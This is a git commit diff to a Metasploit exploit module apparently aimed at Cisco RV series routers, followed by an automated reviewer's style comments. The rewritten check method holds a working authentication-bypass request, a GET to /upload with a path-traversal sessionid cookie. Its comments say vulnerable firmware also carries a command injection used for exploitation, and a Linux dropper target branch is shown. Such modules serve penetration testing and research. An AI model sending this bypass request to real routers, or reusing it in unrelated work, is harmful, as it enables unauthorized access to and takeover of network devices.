Rewrote check method to only abuse authentication bypass. Added additional status checks.

This commit is contained in:
Stephen Wildow 2023-02-11 17:43:33 -05:00
parent 036ed7f467
commit 79b1801a4f
No known key found for this signature in database
GPG Key ID: 3D8ACAD402C22B27
1 changed files with 27 additions and 13 deletions


@ -88,22 +88,35 @@ class MetasploitModule < Msf::Exploit::Remote
) )
end end
def check # sessionid utilized later needs to be set to length
# Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce # of 16 or exploit will fail. Tested with lengths
# Test to see if router is responding and possibly vulnerable # 14-17
res = send_exploit('id') def generate_session_id
return Rex::Text.rand_text_alphanumeric(16)
return CheckCode::Unknown("Didn't receive a response from the target.") if res.nil?
# Versions 1.0.03.26 and above will respond with 403 Forbidden during exploitation
return CheckCode::Safe('The target responded with 403 Forbidden and is not vulnerable.') if res.code == 403
# Vulnerable versions will respond with 301 Moved Permanently in body of response
if res.body.include?('<head><title>301 Moved Permanently</title></head>')
return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
end end
CheckCode::Safe('The target did not respond with an expected payload.') def check
res = send_request_cgi({
'method' => 'GET',
'uri' => '/upload',
'headers' => {
'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id
}
}, 10)
# A proper "upload" will trigger file creation. So created above is an incorrect "upload" call to avoid file
# creation. The router return a status code 405 Not Allowed if authentication has been bypassed by above request.
# The firmware containing this authentication bypass also contains the command injection vulnerability that will be
# abused during actual exploitation. Non-vulnerable firmware versions will respond with 403 Forbidden.
if res.nil?
return CheckCode::Unknown('The device did not respond to request packet.')
elsif !res.nil? && res.code == 405
return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
elsif res.code == 403
return CheckCode::Safe('The device is not vulnerable to exploitation.')
else # Catch-all
return CheckCode::Unknown('The target responded in such a way that exploitation in unknown and unlikely.')
end
end end
def execute_command(cmd, _opts = {}) def execute_command(cmd, _opts = {})
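Review bot: The `!res.nil? &&` in `elsif !res.nil? && res.code == 405` on the new side of `check` is redundant, because the `if res.nil?` branch directly above it has already returned; the line can simply read `elsif res.code == 405`. While the method is being rewritten, the catch-all message has a typo ("exploitation in unknown") and the comment above the status chain reads "The router return a status code" — e.g. `return CheckCode::Unknown('The target responded in such a way that exploitation is unknown and unlikely.')`. The header comment on `generate_session_id` states the id must be exactly 16 characters and then says lengths 14-17 were tested; stating which of those lengths actually worked would make the constraint unambiguous for the next maintainer, and the explicit `return` inside that one-line method is unnecessary. The explicit `return`s in each branch of `check` could likewise be dropped in favour of the `if` expression's value, which is the more idiomatic Ruby form; `execute_command`'s body lies outside this hunk.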
@ -116,6 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
end end
if target['Type'] == :linux_dropper if target['Type'] == :linux_dropper
fail_with(Failure::Unreachable, 'The target did not respond') unless res
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200 fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
begin begin
body_json = res.get_json_document body_json = res.get_json_document